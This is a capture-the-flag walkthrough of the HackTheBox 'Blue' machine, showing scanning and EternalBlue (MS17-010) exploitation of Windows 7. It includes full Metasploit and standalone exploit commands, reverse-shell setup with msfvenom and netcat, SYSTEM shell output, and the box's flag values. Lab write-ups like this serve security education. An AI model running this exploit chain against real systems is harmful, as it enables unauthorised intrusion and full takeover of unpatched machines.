Blue Writeup / Walkthrough Hack the box

TL;DR

This is a writeup of Blue, a Windows box rated easy on HackTheBox. It is based primarily on exploiting the EternalBlue (MS17-010) vulnerability, and no privilege escalation is needed to obtain the root flag.

Walkthrough

This writeup covers exploitation both with and without Metasploit.

Blue Writeup: Scanning Network

Let’s start off by running the usual initial nmap scan.

Nmap 7.91 scan initiated as: nmap -sC -sV -n -v -A -oN nmap.initial 10.129.73.158
 Increasing send delay for 10.129.73.158 from 0 to 5 due to 195 out of 648 dropped probes since last increase.
 Nmap scan report for 10.129.73.158
 Host is up (0.17s latency).
 Not shown: 991 closed ports

 PORT      STATE SERVICE      VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
 49152/tcp open  msrpc        Microsoft Windows RPC
 49153/tcp open  msrpc        Microsoft Windows RPC
 49154/tcp open  msrpc        Microsoft Windows RPC
 49155/tcp open  msrpc        Microsoft Windows RPC
 49156/tcp open  msrpc        Microsoft Windows RPC
 49157/tcp open  msrpc        Microsoft Windows RPC

 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 Uptime guess: 0.006 days (since Wed Jun  2 11:34:09 2021)
 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=264 (Good luck!)
 IP ID Sequence Generation: Incremental
 Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
 Host script results:
 |_clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s
 | smb-os-discovery:
 |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
 |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
 |   Computer name: haris-PC
 |   NetBIOS computer name: HARIS-PC\x00
 |   Workgroup: WORKGROUP\x00
 |_  System time: 2021-06-02T16:42:28+01:00
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 |   2.02: 
 |_    Message signing enabled but not required
 | smb2-time: 
 |   date: 2021-06-02T15:42:31
 |_  start_date: 2021-06-02T15:34:23
 TRACEROUTE (using port 1720/tcp)
 HOP RTT       ADDRESS
 1   168.18 ms 10.10.14.1
 2   168.38 ms 10.129.73.158
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We have plenty of open ports here. Microsoft RPC on port 135, netbios-ssn on port 139 and Microsoft-DS (Directory Services) SMB on port 445 seem to be the juicy ones, and the PC name shows up as “haris-PC”.

The version string on port 445 says this box is running “Windows 7 Professional 7601 SP1”, and with the box itself named “Blue” we can reasonably expect the EternalBlue (MS17-010) vulnerability here. Let’s confirm it by running the available nmap scripts for SMB vulnerabilities.

In simple words, the Server Message Block (SMB) protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

Checking for SMB vulnerabilities using Nmap scripts

We have the following list of nmap scripts targeted towards verifying any SMB vulnerabilities on the target.

List of nmap SMB vulnerability scripts

P.S. The above list also includes the script for the MS17-010 vulnerability.

Let’s run these SMB targeted scripts on the target using nmap.

┌─[root@kali]─[~/Desktop/Blue HTB]
 └──╼ nmap --script smb-vuln* -sV -v -p 139,445 10.129.156.45
 Starting Nmap 7.91 ( https://nmap.org )
 Nmap scan report for 10.129.156.45
 Host is up (0.19s latency).

 PORT    STATE SERVICE      VERSION
 139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
 Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_smb-vuln-ms10-054: false
 |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
 | smb-vuln-ms17-010:  
 |   VULNERABLE: 
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
 |     State:   VULNERABLE 
 |     IDs:  CVE:CVE-2017-0143 
 |     Risk factor: HIGH 
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1 
 |        servers (ms17-010). 
 |            
 |     Disclosure date: 2017-03-14 
 |     References: 
 |      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 
 |      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 
 |_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 NSE: Script Post-scanning.
 Read data files from: /usr/bin/../share/nmap
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 
 Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds
            Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Great! The box is vulnerable to EternalBlue (MS17-010) as expected. Let’s move ahead with the exploitation phase using Metasploit.
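On the defensive side, the same nmap text output can be triaged automatically to list which hosts report an smb-vuln-* script as VULNERABLE (with its CVE IDs) and what their SMBv1 message signing state is. The Python below is an added example, not part of the original writeup; the sample text is constructed from the two scans shown above, and the second host (192.0.2.10) is a made-up entry for contrast.

```python
import re

# Constructed sample, trimmed from the scans in this writeup (nmap -oN text output).
SAMPLE = """\
Nmap scan report for 10.129.156.45
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap scan report for 192.0.2.10
Host script results:
| smb-security-mode:
|_  message_signing: required
"""

HOST = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT = re.compile(r"^\|[_ ]([A-Za-z0-9][\w.-]*):")  # top-level NSE script line
STATE = re.compile(r"State:\s*(.+)")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def triage(nmap_text):
    """Map each host to its VULNERABLE smb-vuln-* findings and SMBv1 signing state."""
    hosts, cur, script = {}, None, None
    for raw in nmap_text.splitlines():
        line = raw.strip()
        if m := HOST.match(line):
            cur, script = hosts.setdefault(m.group(1), {"findings": {}, "signing": None}), None
        elif cur is None or not line.startswith("|"):
            continue
        elif m := SCRIPT.match(line):
            script = m.group(1)
            if script.startswith("smb-vuln-"):
                cur["findings"][script] = {"state": "", "cves": set()}
        elif script in cur["findings"]:  # nested line of an smb-vuln-* block
            f = cur["findings"][script]
            if m := STATE.search(line):
                f["state"] = m.group(1).strip()
            f["cves"].update(CVE.findall(line))  # set: reference URLs repeat the ID
        elif script == "smb-security-mode" and "message_signing:" in line:
            cur["signing"] = line.split("message_signing:")[1].split()[0]
    for h in hosts.values():  # keep only confirmed or likely findings
        h["findings"] = {s: sorted(f["cves"]) for s, f in h["findings"].items()
                         if f["state"].startswith(("VULNERABLE", "LIKELY VULNERABLE"))}
    return hosts
```

Single-line results such as `smb-vuln-ms10-054: false` carry no State field and are dropped, so only hosts with a reported vulnerable state end up with findings.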

Blue Writeup: Exploitation (with Metasploit)

Firing up the Metasploit framework and using the MS17-010 exploit on the target.

Please note that your LHOST must be set to the HackTheBox VPN network IP address.

msf5 > search ms17-010
 Matching Modules
 #  Name                                           Disclosure Date  Rank     Check  Description
 -  ----                                           ---------------  ----     -----  -----------
 0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
 1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
 2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
 4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
 5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution 

 msf5 > use 2

 msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
 Module options (exploit/windows/smb/ms17_010_eternalblue):
    Name           Current Setting  Required  Description
    ----           ---------------  --------  -----------
    RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    RPORT          445              yes       The target port (TCP)
    SMBDomain      .                no        (Optional) The Windows domain to use for authentication
    SMBPass                         no        (Optional) The password for the specified username
    SMBUser                         no        (Optional) The username to authenticate as
    VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
    VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
 Exploit target:
    Id  Name
    --  ----
    0   Windows 7 and Server 2008 R2 (x64) All Service Packs

 msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.156.45

 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
 payload => windows/x64/meterpreter/reverse_tcp

 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 [-] 10.129.156.45:445 - Exploit failed: The following options failed to validate: LHOST.
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.53
 LHOST => 10.10.14.53
 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
 [*] Started reverse TCP handler on 10.10.14.53:4444
 [*] 10.129.156.45:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
 [+] 10.129.156.45:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
 [*] 10.129.156.45:445     - Scanned 1 of 1 hosts (100% complete)
 [*] 10.129.156.45:445 - Connecting to target for exploitation.
 [+] 10.129.156.45:445 - Connection established for exploitation.
 [+] 10.129.156.45:445 - Target OS selected valid for OS indicated by SMB reply
 [*] 10.129.156.45:445 - CORE raw buffer dump (42 bytes)
 [*] 10.129.156.45:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
 [*] 10.129.156.45:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
 [*] 10.129.156.45:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
 [+] 10.129.156.45:445 - Target arch selected valid for arch indicated by DCE/RPC reply
 [*] 10.129.156.45:445 - Trying exploit with 12 Groom Allocations.
 [*] 10.129.156.45:445 - Sending all but last fragment of exploit packet
 [*] 10.129.156.45:445 - Starting non-paged pool grooming
 [+] 10.129.156.45:445 - Sending SMBv2 buffers
 [+] 10.129.156.45:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
 [*] 10.129.156.45:445 - Sending final SMBv2 buffers.
 [*] 10.129.156.45:445 - Sending last fragment of exploit packet!
 [*] 10.129.156.45:445 - Receiving response from exploit packet
 [+] 10.129.156.45:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
 [*] 10.129.156.45:445 - Sending egg to corrupted connection.
 [*] 10.129.156.45:445 - Triggering free of corrupted buffer.
 [*] Sending stage (201283 bytes) to 10.129.156.45
 [*] Meterpreter session 1 opened (10.10.14.53:4444 -> 10.129.156.45:49158) at 2021-06-03 09:46:36 -0400
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                                                       
 meterpreter > sysinfo                                                                                                                                             
 Computer        : HARIS-PC
 OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
 Architecture    : x64
 System Language : en_GB
 Domain          : WORKGROUP
 Logged On Users : 0
 Meterpreter     : x64/windows

 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM

 meterpreter > shell
 Process 2904 created.
 Channel 1 created.
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Windows\system32> whoami
 whoami
 nt authority\system
 C:\Users> dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is A0EF-1911
 Directory of C:\Users
 21/07/2017  07:56    <DIR>          .
 21/07/2017  07:56    <DIR>          ..
 21/07/2017  07:56    <DIR>          Administrator
 14/07/2017  14:45    <DIR>          haris
 12/04/2011  08:51    <DIR>          Public
                0 File(s)              0 bytes
                5 Dir(s)  17,254,989,824 bytes free                                                                                                                         

Oh man, this was pretty easy! We are NT AUTHORITY\SYSTEM right away.

Blue Writeup: Exploitation (without Metasploit)

Searching for the MS17-010 exploit.

Searching for exploit

Let’s create a copy of this exploit in our current directory. Instead of copying the file manually, we can pass the exploit ID to searchsploit with the --mirror flag to create a copy of the exploit in the current directory.

Copying the exploit

After going through the exploit code, I found that the following changes were needed.

  • After a little enumeration we found that “guest” login is allowed on the machine, so we need to add ‘guest’ in the USERNAME field of the exploit.
enum4linux results
USERNAME
  • Create a reverse shell payload using msfvenom, and specify the path to this payload in the exploit.
msfvenom payload
adding path to payload

Let’s now open a listener on port 4444

listener port 4444

And run the MS17-010 python exploit.

┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ python 42315.py 10.129.159.0

Getting a reverse shell.

┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ nc -nlvp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158 
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami 
nt authority\system

We are NT AUTHORITY\SYSTEM. Let’s quickly retrieve the flags.

Blue Writeup: User Flag

C:\Users> cd haris\Desktop 

C:\Users\haris\Desktop> type user.txt
4c546aea7dbee75cbd71de245c8deea9

Blue Writeup: Root Flag

C:\Users> cd Administrator\Desktop\ 

C:\Users\Administrator\Desktop> type root.txt 
ff548eb71e920ff6c08843ce9df4e717 

Until next time, do check out our other writeups.
